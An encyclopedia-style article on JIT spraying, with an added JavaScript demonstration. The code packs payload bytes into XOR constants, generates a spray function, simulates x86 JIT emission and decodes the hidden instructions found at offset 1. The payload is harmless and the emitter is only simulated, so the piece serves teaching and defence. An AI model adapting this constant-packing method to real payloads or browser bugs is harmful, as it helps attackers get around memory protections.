JIT spraying

JIT spraying is a class of computer security exploit that circumvents the protections of address space layout randomization (ASLR) and data execution prevention (DEP) by exploiting the behavior of just-in-time (JIT) compilation.

Since a JIT compiler's purpose is to produce executable data, it is one of the few types of programs that cannot run in an environment that forbids executable data: the memory into which the JIT writes machine code must become executable, so DEP cannot be applied to it in the usual way. An attacker who can influence what the JIT emits therefore obtains executable bytes of their choosing, and by having many copies of the same function compiled ("spraying") they fill a large part of the address space with those bytes, so that a guessed address is likely to land inside one of the copies despite ASLR.

To turn the JIT's output into exploit code, an idea from Dion Blazakis[4] is used. The input program, usually JavaScript or ActionScript, is written to contain numerous constant values, and the JIT embeds those constants verbatim as immediate operands of the machine instructions it emits. If control is transferred into the middle of such an instruction rather than to its start, the processor decodes the constant bytes themselves as instructions, so the attacker chooses constants whose bytes form the code they want to run.
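The following JavaScript is an added example and is not code from the page, from Blazakis' paper, or from any JIT engine. It models the constant-embedding trick for an x86 JIT that compiles each "^ 0xNNNNNNNN" operand of a function into "xor eax, imm32" (opcode 0x35 followed by the 4-byte little-endian immediate), which is the emission behavior the technique relies on; the packer, the simulated emitter, the sample payload and the tiny decoder are all assumptions constructed for illustration, and no engine is actually run.

```javascript
// Added illustration of Blazakis-style JIT spraying; not code from the page or
// from any JIT engine. Assumption: the target is an x86 JIT that compiles each
// "^ 0xNNNNNNNN" operand into "xor eax, imm32" (opcode 0x35 followed by the
// 4-byte little-endian immediate). No engine is run; its output is simulated.

const OP_XOR_EAX_IMM32 = 0x35; // xor eax, imm32 (1 opcode byte + 4 immediate bytes)
const OP_CMP_AL_IMM8   = 0x3c; // cmp al, imm8   (1 opcode byte + 1 immediate byte)
const OP_NOP           = 0x90;

// Pack payload bytes into 32-bit constants, three per constant. The top byte
// 0x3c is emitted last; read one byte off, it decodes as "cmp al, imm8" and
// swallows the next constant's 0x35 opcode. Because of that glue instruction,
// each 3-byte chunk must be a self-contained instruction sequence.
function packPayload(payload) {
  const consts = [];
  for (let i = 0; i < payload.length; i += 3) {
    const chunk = payload.slice(i, i + 3);
    while (chunk.length < 3) chunk.push(OP_NOP); // pad the final chunk with nops
    const [b0, b1, b2] = chunk;
    consts.push(((OP_CMP_AL_IMM8 << 24) | (b2 << 16) | (b1 << 8) | b0) >>> 0);
  }
  return consts;
}

// Source text of the function the attacker sprays. Chaining off a parameter
// instead of a literal keeps a constant-folding parser from collapsing the chain.
function spraySource(consts) {
  const ops = consts.map(c => '0x' + c.toString(16).padStart(8, '0')).join(' ^ ');
  return 'function spray(x) { return x ^ ' + ops + '; }';
}

// Simulated JIT output for the chain: one "xor eax, imm32" per operand.
function emitXorChain(consts) {
  const code = [];
  for (const c of consts) {
    code.push(OP_XOR_EAX_IMM32, c & 0xff, (c >>> 8) & 0xff, (c >>> 16) & 0xff, (c >>> 24) & 0xff);
  }
  return code;
}

// Minimal x86 decoder covering only the opcodes this example uses; anything
// else is shown as a raw byte.
function decode(bytes, start) {
  const hex = n => '0x' + n.toString(16).padStart(2, '0');
  const insns = [];
  let i = start;
  while (i < bytes.length) {
    const op = bytes[i];
    if (op === OP_XOR_EAX_IMM32 && i + 4 < bytes.length) {
      const imm = (bytes[i + 1] | bytes[i + 2] << 8 | bytes[i + 3] << 16 | bytes[i + 4] << 24) >>> 0;
      insns.push('xor eax, 0x' + imm.toString(16).padStart(8, '0')); i += 5;
    } else if (op === OP_CMP_AL_IMM8 && i + 1 < bytes.length) {
      insns.push('cmp al, ' + hex(bytes[i + 1])); i += 2;
    } else if (op === OP_NOP) { insns.push('nop'); i += 1; }
    else if (op === 0x31 && bytes[i + 1] === 0xc0) { insns.push('xor eax, eax'); i += 2; }
    else if (op === 0xcc) { insns.push('int3'); i += 1; }
    else { insns.push('db ' + hex(op)); i += 1; }
  }
  return insns;
}

// Bytes actually executed when entry is at offset 1, minus the "cmp al, 0x35"
// glue: this should be exactly the payload that was packed.
function recoverPayload(code) {
  const out = [];
  for (let i = 1; i + 2 < code.length; i += 5) out.push(code[i], code[i + 1], code[i + 2]);
  return out;
}

// Constructed sample payload (not real shellcode): three nops, "xor eax, eax",
// "int3". A real payload's last chunk would jump elsewhere before the chain ends.
const PAYLOAD = [0x90, 0x90, 0x90, 0x31, 0xc0, 0xcc];
const CONSTS = packPayload(PAYLOAD);
const CODE = emitXorChain(CONSTS);
const INTENDED = decode(CODE, 0); // what the JIT meant: two harmless xors
const HIDDEN = decode(CODE, 1);   // what runs if control lands one byte in

console.log(spraySource(CONSTS));
console.log('entry at +0:', INTENDED.join('; '));
console.log('entry at +1:', HIDDEN.join('; '));
```

Run with node: the generated function is ordinary, valid JavaScript that computes an XOR, yet the same bytes read from offset 1 decode to the packed payload with one "cmp al, 0x35" between each 3-byte chunk. Modern engines added mitigations such as constant blinding, which XORs each emitted immediate with a random value so the attacker no longer controls the bytes in the code stream; the simulated emitter above has no such protection, which is the condition under which the technique works.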

Redirecting control into the sprayed code still requires a separate memory-corruption bug: for example, a buffer overflow or use-after-free could allow the attacker to overwrite a function pointer or return address with an address that falls inside the sprayed region.